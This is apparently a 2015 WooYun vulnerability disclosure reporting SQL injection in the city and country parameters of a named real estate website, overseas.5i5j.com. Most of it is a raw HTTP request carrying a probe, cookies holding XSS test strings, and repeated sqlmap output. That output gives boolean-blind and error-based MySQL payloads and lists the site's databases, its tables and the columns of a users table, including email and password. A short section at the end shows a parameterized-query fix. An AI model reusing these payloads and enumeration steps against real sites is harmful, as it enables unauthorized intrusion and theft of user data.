2015-09-27: Details sent to the vendor; awaiting vendor handling
2015-10-02: The vendor actively ignored the vulnerability; details disclosed to the public
As the title says.
POST /house_hot/hots HTTP/1.1
Content-Length: 37
Content-Type: application/x-www-form-urlencoded
Referer: http://overseas.5i5j.com:80/
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223aad4f993e9ef81fcc61cab8349f5a12%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22111.20.241.204%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1443201305%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Dc96fa1d811150fce47f3e913defa2bdf; PHPSESSID=aiae139n3pu3ibp8nf4dh0m5q1; __utmt=1; __utma=228451417.1772374719.1443200739.1443200739.1443200739.1; __utmb=228451417.1.10.1443200739; __utmc=228451417; __utmz=228451417.1443200739.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); __utmt_t2=1; _pzfxuvpc=1443198734429%7C1293309744112808338%7C2%7C1443201444338%7C1%7C%7C8584618636882922688; _pzfxsvpc=8584618636882922688%7C1443198734429%7C2%7Chttp%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); _pk_ref.12.afaf=%5B%22%22%2C%22%22%2C%22%22%2C%22%22%2C%22%22%2C%22%22%2C1443198734%2C%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%5D; _pk_id.12.afaf=fceebd0baed67aba.1443198734.1.1443201476.1443198734.; _pk_ses.12.afaf=*
Host: overseas.5i5j.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

city=1'%22&country=USA&desc_w=0&page=
Both the city parameter and the country parameter are injectable.
sqlmap identified the following injection points with a total of 838 HTTP(s) requests:
---
Parameter: city (POST)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: city=-7540' OR MAKE_SET(9279=9279,5299) AND 'uuQP'='uuQP&country=USA&desc_w=0&page=

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: city=-9738' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6626=6626) THEN 1 ELSE 0 END)),0x717a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&country=USA&desc_w=0&page=
---
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL >= 5.0.0
current user: '5i5j@localhost'
current database: '5i5j'
current user is DBA: False
available databases [3]:
[*] 5i5j
[*] information_schema
[*] test

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: city (POST)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: city=-7540' OR MAKE_SET(9279=9279,5299) AND 'uuQP'='uuQP&country=USA&desc_w=0&page=

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: city=-9738' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6626=6626) THEN 1 ELSE 0 END)),0x717a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&country=USA&desc_w=0&page=
---
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL >= 5.0.0
Database: 5i5j
[13 tables]
+-------------------------+
| zt_houses-bak           |
| zt_5j_users             |
| zt_adviser              |
| zt_country_city         |
| zt_entrust              |
| zt_favorites            |
| zt_house_pic            |
| zt_house_pic_2014_05_08 |
| zt_houses               |
| zt_houses_2014_05_08    |
| zt_news                 |
| zt_subject              |
| zt_users                |
+-------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: city (POST)
    Type: boolean-based blind
    Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: city=-7540' OR MAKE_SET(9279=9279,5299) AND 'uuQP'='uuQP&country=USA&desc_w=0&page=

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: city=-9738' OR 1 GROUP BY CONCAT(0x71707a6b71,(SELECT (CASE WHEN (6626=6626) THEN 1 ELSE 0 END)),0x717a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)#&country=USA&desc_w=0&page=
---
web application technology: Nginx, PHP 5.4.25
back-end DBMS: MySQL >= 5.0.0
Database: 5i5j
Table: zt_5j_users
[8 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| 5j_id     | varchar(255) |
| adddate   | datetime     |
| email     | varchar(255) |
| Id        | int(11)      |
| lastlogin | datetime     |
| password  | varchar(255) |
| tel       | varchar(255) |
| username  | varchar(255) |
+-----------+--------------+
Use parameterized queries and filter the input parameters.
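The two fixes named above, parameterized queries and parameter filtering, shown beside the concatenated form they replace. This is an added example, not code from the original report or from the vendor. SQLite stands in for the MySQL back end, and the `houses` table, its columns and the validation rules are assumptions. The probe is the decoded `city` value from the request shown earlier.

```python
import sqlite3

def make_db():
    # Constructed stand-in table; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE houses (id INTEGER PRIMARY KEY, city TEXT, country TEXT, title TEXT)")
    db.executemany("INSERT INTO houses (city, country, title) VALUES (?, ?, ?)",
                   [("1", "USA", "listing A"), ("2", "USA", "listing B"), ("1", "CAN", "listing C")])
    return db

def search_vulnerable(db, form):
    # 'Before': POST values are concatenated into the SQL text, so a quote
    # character in city or country changes the structure of the statement.
    sql = ("SELECT title FROM houses WHERE city = '" + form["city"] +
           "' AND country = '" + form["country"] + "'")
    return [r[0] for r in db.execute(sql)]

def search_bound_only(db, form):
    # Parameterized query: values are bound, never parsed as SQL.
    sql = "SELECT title FROM houses WHERE city = ? AND country = ?"
    return [r[0] for r in db.execute(sql, (form["city"], form["country"]))]

def validate(form):
    # Parameter filtering (assumed rules): numeric city id, short alphabetic
    # country code, optional numeric page.
    city, country = form.get("city", ""), form.get("country", "")
    page = form.get("page", "") or "1"
    if not (city.isascii() and city.isdigit() and len(city) <= 6):
        raise ValueError("city must be a numeric id")
    if not (country.isascii() and country.isalpha() and len(country) <= 3):
        raise ValueError("country must be a short alphabetic code")
    if not (page.isascii() and page.isdigit() and len(page) <= 6):
        raise ValueError("page must be a number")
    return city, country, max(int(page), 1)

def search_safe(db, form, page_size=10):
    # 'After': validate first, then bind every value, including paging.
    city, country, page = validate(form)
    sql = ("SELECT title FROM houses WHERE city = ? AND country = ? "
           "ORDER BY id LIMIT ? OFFSET ?")
    args = (city, country, page_size, (page - 1) * page_size)
    return [r[0] for r in db.execute(sql, args)]

if __name__ == "__main__":
    db = make_db()
    probe = {"city": "1'\"", "country": "USA", "desc_w": "0", "page": ""}
    print(search_bound_only(db, probe))  # bound value matches no row
```

Binding alone keeps the probe inert; the validation layer additionally rejects it before any query runs, which gives the application a clean point to log and alert on malformed input.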
Severity: No impact; ignored by vendor
Ignored at: 2015-10-02 14:20
Vulnerability Rank: 4 (WooYun rating)
None yet